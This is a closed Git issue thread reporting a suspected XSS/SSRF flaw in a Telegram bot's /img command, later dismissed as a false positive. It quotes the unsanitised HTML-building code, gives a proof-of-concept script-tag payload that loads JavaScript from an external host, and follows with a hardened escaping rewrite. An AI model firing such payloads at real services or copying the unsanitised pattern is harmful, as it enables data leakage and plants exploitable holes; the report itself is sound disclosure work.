Fix input handling for security purpose. #2

Closed
opened 2020-03-29 23:26:29 +02:00 by h0nus · 3 comments
Collaborator

Due to poor input sanitization, the /img call in the bot is vulnerable to Blind XSS/SSRF.

Vulnerable code:

```python
if command.getMode() == "imageurl":
    contentText = InputTextMessageContent("<a href=\"" + qValue + "\">HonusBot</a>", "HTML")
elif command.getMode() == "genericurl":
    contentText = InputTextMessageContent("<a href=\"" + qValue + "\">link</a>", "HTML")
else:
    contentText = InputTextMessageContent("Error", "HTML")
```

qValue is inserted without sanitization into the HTML content, making it vulnerable to XSS/Blind XSS.

Poc part 1: `/img "><script type="text/javascript" src="https://asdafasdas.free.beeceptor.com/first.js"></script><"`

Poc part 2:
Screen 1, request to first.js

image

Screen 2, headers leaked, and the IP address could also be leaked.

image

Poc part 3 - theoretically:
Since it's possible to abuse the function to inject JavaScript/HTML, an attacker could perform SSRF and use the bot as a proxy, or even read local files and send the content to an external host.

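Whatever the outcome of the triage, the snippet quoted in the report concatenates user input straight into HTML parse-mode text. The following is an added, hardened rewrite of that snippet (example code, not from the HonusBot project): it only accepts absolute http(s) URLs and HTML-escapes the value before it lands in the `href` attribute. `InputTextMessageContent` here is a minimal stand-in for the library class so the example runs offline; the link labels are the ones from the original snippet.

```python
import html
from urllib.parse import urlsplit

# Constructed stand-in for the Telegram library's InputTextMessageContent,
# kept minimal so the example runs without the bot framework installed.
class InputTextMessageContent:
    def __init__(self, message_text, parse_mode=None):
        self.message_text = message_text
        self.parse_mode = parse_mode

# Labels per mode, taken from the snippet in the report.
LABELS = {"imageurl": "HonusBot", "genericurl": "link"}

def safe_url(raw):
    """Return the normalised URL if it is an absolute http(s) URL, else None."""
    try:
        parts = urlsplit(raw.strip())
    except ValueError:          # e.g. malformed IPv6 host literal
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return parts.geturl()

def build_link_content(mode, qValue):
    """Hardened replacement for the mode/qValue branch in the report."""
    label = LABELS.get(mode)
    url = safe_url(qValue) if label else None
    if url is None:
        return InputTextMessageContent("Error", "HTML")
    # quote=True also escapes " and ', so the value cannot close the attribute
    href = html.escape(url, quote=True)
    return InputTextMessageContent('<a href="%s">%s</a>' % (href, label), "HTML")
```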
Author
Collaborator

Poc part 4 - IP leak thanks to SSRF through JavaScript injection.

image


it's Telegram's stupid preview

Author
Collaborator

Closing as false positive after some discussion with developers.

h0nus closed this issue 2020-03-30 03:45:40 +02:00
Reference: HonusBot/HonusBot#2